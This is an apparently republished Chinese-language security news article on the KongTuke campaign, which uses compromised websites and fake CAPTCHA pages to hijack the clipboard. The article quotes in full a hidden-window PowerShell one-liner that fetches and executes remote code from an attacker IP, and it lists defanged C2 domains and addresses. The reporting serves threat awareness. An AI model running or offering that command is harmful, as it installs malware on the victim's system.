關鍵詞

惡意軟件

網絡安全研究人員發現了一種名為“KongTuke”的復雜新型網絡攻擊鏈，它通過入侵合法網站攻擊毫無戒心的互聯網用戶。

Palo Alto Networks 的 Unit 42 團隊的 Bradley Duncan 在一份報告中詳細介紹了此次攻擊，該攻擊利用惡意腳本和偽造的 CAPTCHA 頁面劫持受害者的剪貼板并可能安裝未識別的惡意軟件。

該調查結果于 2025 年 4 月 4 日分享，Unit 42 Intel 在 X 上發布了更多見解，凸顯了此次活動日益增長的威脅。

攻擊鏈

KongTuke 攻擊始于向合法但易受攻擊的網站注入惡意腳本。報告中引用的一個例子是 hxxps://lancasternh[.]com/6t7y.js，它會將用戶重定向到 hxxps://lancasternh[.]com/js.php 上的輔助腳本。

該腳本收集有關受害者設備的詳細信息，包括 IP 地址、瀏覽器類型和引薦來源數據，以 base64 格式編碼。

從那里，用戶會被引導到一個模仿 CAPTCHA 的欺騙性“驗證您是人類”頁面，CAPTCHA 是一種常見的安全功能，旨在區分人類和機器人。

然而，這個 CAPTCHA 是個詭計。該頁面不驗證身份，而是采用一種稱為“剪貼板劫持”或“粘貼劫持”的技術。它會秘密地將惡意的 PowerShell 腳本注入受害者的剪貼板，并附帶指示，敦促用戶通過 Windows 運行窗口粘貼并執行該腳本。

Duncan 詳細描述了該腳本，其內容如下：

powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

此命令連接到遠程服務器 138.199.156[.]22:8080，并根據時間戳計算檢索其他惡意負載。

交通和感染后活動

根據 Unit 42 的報告，該腳本一旦執行，就會發起一系列網絡請求。初始流量包括對同一 IP 地址的 GET 和 POST 請求，然后連接到 ecduutcykpvkbim[.]top 和 bfidmcjejlilflg[.]top 等域。

這些托管在 185.250.151[.]155:80 的域名似乎是進一步感染的中轉站。感染后，受感染的系統通過 173.232.146[.]62:25658 與 8qvihxy8x5nyixj[.]top 建立命令和控制 (C2) 通信，使用 TLSv1.0 HTTPS 流量。

有趣的是，受感染的主機還使用 api.ipify[.]org 和 ipinfo[.]io 等服務執行 IP 地址檢查，收集城市、地區和國家/地區等地理位置數據。雖然此步驟本身并不惡意，但它表明攻擊者正在對受害者進行分析，以進行有針對性的利用。

熟悉卻難以捉摸的威脅

網絡安全社區一直在關注 KongTuke 活動，包括 Mastodon 上的 @monitorsg 和 ThreatFox，標簽為 #KongTuke。鄧肯指出，感染后的流量與著名遠程訪問木馬 AsyncRAT 的模式相似。然而，最終的惡意軟件負載仍未確定，因為研究人員尚未獲得樣本進行分析。這種不確定性凸顯了威脅的不斷演變以及打擊威脅的挑戰。

2025 年 4 月 4 日，Unit 42 Intel 通過 X 向公眾發出警告，稱：“在合法但被入侵的網站的頁面中注入 #KongTuke 腳本會導致偽造的 # CAPTCHA樣式頁面和 #ClipboardHijacking（#pastejacking）。

這些頁面要求用戶將惡意腳本粘貼到運行窗口中?！痹撎涌赏ㄟ^ https://x.com/Unit42_Intel/status/1908253830166323637 訪問，其中包含更多詳細信息的鏈接和虛假 CAPTCHA 頁面的圖片，強調了提高認識的緊迫性。

報告作者 Bradley Duncan 在他的筆記中強調了這次攻擊的陰險性：“這個過程有時被稱為‘剪貼板劫持’或‘粘貼劫持’，以例行驗證為幌子誘騙用戶執行有害代碼?！笔褂檬艿礁腥镜暮戏ňW站會增加一層信任，這使得攻擊變得尤為危險。

網絡安全專家敦促用戶在遇到 CAPTCHA 提示時要小心謹慎，尤其是那些要求手動執行腳本的提示。合法的 CAPTCHA 通常涉及圖像選擇等簡單任務，而不是復制和粘貼代碼。用戶還應保持系統更新，避免點擊可疑鏈接，并使用強大的防病毒軟件來檢測和阻止此類威脅。

隨著 KongTuke 活動的不斷發展，Unit 42 及其他機構的研究人員正在努力識別最終的惡意軟件并破壞攻擊基礎設施。目前，警惕仍然是防范這種在日常網絡互動中利用信任的狡猾手段的最佳方法。

來源： https://cybersecuritynews.com/fake-captcha/

安全圈

網羅圈內熱點 專注網絡安全

實時資訊一手掌握！

好看你就分享 有用就點個贊

支持「安全圈」就點個三連吧！